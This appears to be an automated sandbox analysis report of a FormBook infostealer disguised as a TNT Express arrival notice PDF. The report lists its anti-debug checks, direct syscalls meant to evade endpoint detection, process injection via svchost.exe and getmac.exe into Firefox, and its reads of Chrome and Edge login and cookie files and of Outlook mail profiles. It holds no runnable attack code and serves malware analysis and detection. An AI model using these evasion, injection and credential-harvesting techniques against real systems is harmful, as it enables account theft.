Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]	2_2_03228918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]	2_2_0327096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]	2_2_032D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]	2_2_032BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]	2_2_032B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]	2_2_032309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]	2_2_032B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_032BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]	2_2_032629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]	2_2_032C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0323A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]	2_2_032649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_032FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]	2_2_03252835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]	2_2_0326A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]	2_2_032D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]	2_2_032BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]	2_2_032BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]	2_2_032C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]	2_2_03260854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]	2_2_03234859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]	2_2_03230887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]	2_2_032BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_032FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0326C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0325E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]	2_2_0325EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]	2_2_032E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232F12 mov eax, dword ptr fs:[00000030h]	2_2_03232F12

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00920B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00920B62

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F2622
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008E083F
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E09D5 SetUnhandledExceptionFilter,	0_2_008E09D5
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_008E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008E0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\getmac.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: NULL target: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: NULL target: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\getmac.exe

Thread register set: target process: 7968

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\getmac.exe

Thread APC queued: target process: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7BC008

Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

0_2_00921201

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00902BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00902BA5

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0092B226 SendInput,keybd_event,

0_2_0092B226

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_009422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_009422DA

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe"	Jump to behavior
Source: C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe	Process created: C:\Windows\SysWOW64\getmac.exe "C:\Windows\SysWOW64\getmac.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

0_2_00920B62

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00921663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00921663

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe, hoCcQGubWgo.exe, 00000003.00000000.1474836948.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000002.3827473577.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hoCcQGubWgo.exe, 00000003.00000000.1474836948.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000002.3827473577.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3829544922.0000000001551000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: hoCcQGubWgo.exe, 00000003.00000000.1474836948.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000002.3827473577.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3829544922.0000000001551000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: hoCcQGubWgo.exe, 00000003.00000000.1474836948.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000003.00000002.3827473577.0000000001AF1000.00000002.00000001.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3829544922.0000000001551000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008E0698 cpuid

0_2_008E0698

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_00938195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00938195

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_0091D27A GetUserNameW,

0_2_0091D27A

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008FB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_008FB952

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe

Code function: 0_2_008C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008C42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\getmac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\getmac.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_81
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_XP
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 